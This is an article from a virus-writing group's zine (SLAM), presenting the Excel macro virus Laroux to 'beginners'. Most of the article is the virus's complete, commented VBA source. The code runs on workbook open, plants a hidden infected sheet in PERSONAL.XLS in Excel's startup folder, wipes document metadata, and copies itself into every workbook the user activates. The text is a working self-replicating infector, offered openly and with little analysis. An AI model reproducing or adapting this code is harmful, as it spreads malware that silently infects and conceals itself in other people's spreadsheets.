Copy Link
Add to Bookmark
Report
SLAM2.014: Description of ExcelMacro Virus Laroux
[ ExcelMacro. Laroux ]----------
˛ VIRUSNAME: Laroux
˛ ORIGIN: ?????
˛ AUTHOR: ?????
->Polymorf No
->Stealth Yes
->Encrypted No
->Retro No
---------------------------------
Laroux was the first working Excel infector. The code is quite easy to understand for beginners. Look at the following source code.
-----------------------------------------------------------------------------
Sub auto_open()
Application.OnSheetActivate = "check_files" 'check_files will be
'active if someone
'open a document
End Sub 'end
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
Application.ScreenUpdating = False 'ScreenUpdating Off
n4$ = ActiveWorkbook.Name 'n4$ = name of the
'active document.
Sheets("laroux").Visible = True 'Open and select the
Sheets("laroux").Select 'the laroux macro and
Sheets("laroux").Copy 'copy it.
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.Name 'get again the name
'of the active file.
c4$ = CurDir() 'c4$=the current path.
ChDir Application.StartupPath 'go to the startup
'directory.
ActiveWindow.Visible = False
'Save now the active
'file in the startup
'directory. (with the
'name personal.xls)
Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" _
& "PERSONAL.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$ 'go back.
Workbooks(n4$).Sheets("laroux").Visible = False 'make the laroux sheet
'invisible :)
Application.OnSheetActivate = ""
Application.ScreenUpdating = True 'ScreenUpdating On
'and activate the
Application.OnSheetActivate = "personal.xls!check_files" 'virus
Case 1
Application.ScreenUpdating = False 'ScreenUpdating Off
n4$ = ActiveWorkbook.Name 'n4$ = name of the
'active document.
p4$ = ActiveWorkbook.Path 'p4$ = path of it.
s$ = Workbooks(n4$).Sheets(1).Name 's$ = the name of
'the first sheet.
If s$ <> "laroux" Then 'if s$ not "laroux"
'then infect the
'active file.
Workbooks("PERSONAL.XLS").Sheets("laroux").Copy before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("laroux").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True 'ScreenUpdating On
'and activate the
Application.OnSheetActivate = "personal.xls!check_files" 'virus
Case Else
End Select
End Sub 'end.
-----------------------------------------------------------------------------
That's it.
Nightmare Joker [SLAM]
